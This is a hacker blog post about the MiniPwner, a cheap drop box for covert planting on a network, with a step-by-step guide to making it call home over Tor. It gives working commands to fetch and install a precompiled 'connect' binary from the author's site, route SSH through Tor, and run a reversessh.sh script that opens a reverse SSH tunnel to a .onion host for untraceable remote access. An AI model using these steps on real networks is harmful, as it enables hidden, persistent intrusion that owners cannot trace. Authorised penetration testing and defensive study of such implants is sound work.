MiniPwner – Evil Network Dropbox

The MiniPwner is a penetration testing “drop box”, it is a small, cheap, and simple but powerful device that can be inconspicuously plugged into a network and provide the penetration tester remote access to that network. I purchased this device for a project here @ NESIT and thought it packed quite a punch for only $23, compared to the pwnie express plugs which run upwards of $500. And at that price you could afford to lose one or two on a pentesting job and not be hurting :p

minipwner
Some of the features of the minipwner include:

  • Atheros 400MHz MIPS CPU
  • 32MB RAM
  • 4MB flash
  • 10/100Mbps Ethernet interface
  • 802.11b/g/n wireless interface with one internal antenna
  • USB 2.0 port
  • Micro-USB power socket, approximately 1W power draw
  • 5.7cm x 5.7cm x 1.8cm dimensions
  • Nmap network scanner
  • Tcpdump sniffer
  • Netcat Hacker’s swiss army knife
  • aircrack Wireless network analysis
  • kismet Wireless network analysis
  • perl Perl Scripting Language
  • openvpn VPN Client and Server
  • dsniff suite of sniffing and spoofing tools, including arpspoof
  • nbtscan NetBIOS Network Scanner
  • snort Sniffer, Packet Logger, Intrusion Detection System
  • karma Wireless Sniffing Tool
  • samba2-client Windows File Sharing Client
  • elinks Text Based Web Browser
  • yafc FTP Client
  • openssh-sftp-client Secure File Transfer Client

So after doing the initial install of open-wrt firmware and configurations for the other applications I came across an awesome article on SecurityGeneration.com which described some james bond type shit of having your pwnie express connect back to you over tor so you would essentially be untraceable. Instead of having it connect back through ssh to your IP address you would be connecting back to a tor *.onion address. But since I dont have a pwnplug the only problem that lied ahead was to convert the instructions to work on this minipwner box. Now im not an expert on getting this shit configured properly so i relied on some help from friends and general guessing to get it up and running, so your mileage may vary.

I’m not going to rehash getting minipwner onto the tp-link here, so i’ll pick up where his article left off. And im not going to rehash getting your tor hidden server running, follow step 1. on SecurityGeneration’s article if you need to figure it out.

First thing I did was get tor installed on the USB drive (which should already be setup with the original instructions on the minipwner site)

opkg -dest usb install tor-geoip

then symlink it

ln -s /mnt/usb/usr/share/tor /root/.tor

edit the tor config file

vi /etc/tor/torrc

Scroll to the bottom and change User tor to User root
next find DataDirectory /var/lib/tor and change it to /mnt/usb/usr/share/tor/lib then save the config file. This changes the logging to the USB drive, otherwise tor will start and start writing to the minipwners flash memory and soon it’ll be full. You should be able to start tor with no errors by typing tor. as long as it work you might wanna have tor start when the minipwner powers up.

add tor to default run level (startup):

cd /etc/rc.d
ln -s ../init.d/tor S99tor

Now the hardest part of the instructions was to wget connect.c and compile it. By default open-wrt doesn’t have anything to compile programs in their repository, so it’s a clusterfuck because you need to do to cross-compile connect.c for the minipwners MIPS architecture on another box using the toolchain shit , then send it over to you minipwner and pray that it works. Luckily I already went though this and have binary ::here::. I’ll write more about doing this at a later time. So, all’s you need to do is:

wget http://nesit.org/files/connect
mkdir /usr/local/
mkdir /usr/local/bin/
mv connect /usr/local/bin/connect
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Now we need to get open-ssh on the minipwner:

opkg -dest usb install openssh-client-utils

Then we need to edit the ssh config file

vi /etc/ssh/ssh_config

add these 2 line to the bottom and save the config:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Then I made a simple script to automate it to connect back to your hidden tor server
just change the blablablabla.onion to your .onion address and the ssh_user to your username

vi reversessh.sh

#!/bin/sh
Rec_Port=22
Remote_Tor=blablablabla.onion
SSH_user=anonymous
SSH_key=”/root/.ssh/id_rsa”
/mnt/usb/usr/bin/ssh -NR 3330:localhost:22 -i “$SSH_key” “$SSH_user”@”$Remote_Tor” -p “$Rec_Port”;

then save and chmod

chmod 0755 reversessh.sh

If all goes well you should be able to

./reversessh.sh

and on your tor hidden server you can just run watch “netstat -lntup” you should see:

tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous

You should be able to

ssh root@localhost -p 3330

you should be connected to your minipwner over tor :)

If anyone has anything to add/fix to this please hit me up illwill at illmob.org. Thnx to |m| & inhibit for help on getting this working.

Categories